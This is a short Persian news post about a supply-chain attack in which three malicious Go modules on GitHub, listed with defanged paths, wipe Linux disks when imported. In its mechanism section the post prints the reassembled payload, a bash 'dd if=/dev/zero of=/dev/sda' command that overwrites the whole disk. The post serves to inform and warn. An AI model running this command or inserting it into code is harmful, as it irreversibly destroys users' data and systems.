محققان امنیتی از ظهور یک حمله خطرناک به زنجیره تأمین در اکوسیستم زبان برنامهنویسی Go خبر دادهاند که با استفاده از ماژولهای مخرب، بدافزارهایی را برای پاکسازی کامل دیسک به سیستمها تزریق میکند.
🔍 شرح ماجرا:
در آوریل ۲۰۲۵، تیم امنیتی Socket.dev سه ماژول مخرب در GitHub شناسایی کرد:
-
github[.]com/truthfulpharm/prototransform
-
github[.]com/blankloggia/go-mcp
-
github[.]com/steelpoor/tlsproxy
این ماژولها با استفاده از تکنیکهای obfuscation (پنهانسازی کد) هدف خود را مخفی میکردند و هنگام ایمپورت شدن در پروژه، بهطور خودکار کد اجرایی خود را فعال میکردند. این حمله بر اساس Namespace Confusion طراحی شده است، جایی که نام ماژولها بهگونهای انتخاب شدهاند که با ماژولهای معتبر شباهت داشته باشند تا توسعهدهندگان بهاشتباه آنها را انتخاب کنند.
💣 مکانیسم حمله:
کد مخرب بهصورت رشتههای تکهتکه پنهان شده و سپس در زمان اجرا بهشکل زیر سرهمبندی و اجرا میشود:
#!/bin/bash
dd if=/dev/zero of=/dev/sda bs=1M conv=fsync
sync
این دستور ساده ولی مرگبار، تمام اطلاعات موجود روی دیسک /dev/sda
را با صفر بازنویسی میکند و باعث نابودی کامل فایلها، سیستم عامل، و دادههای کاربر میشود. این بدافزار بهصورت خاص سیستمعامل لینوکس را هدف قرار میدهد.
📉 پیامدها:
-
نابودی غیرقابلبازگشت دادهها
-
ازکارافتادگی سیستمها و زیرساخت
-
خسارات چند میلیون دلاری برای سازمانهای قربانی
یک نظر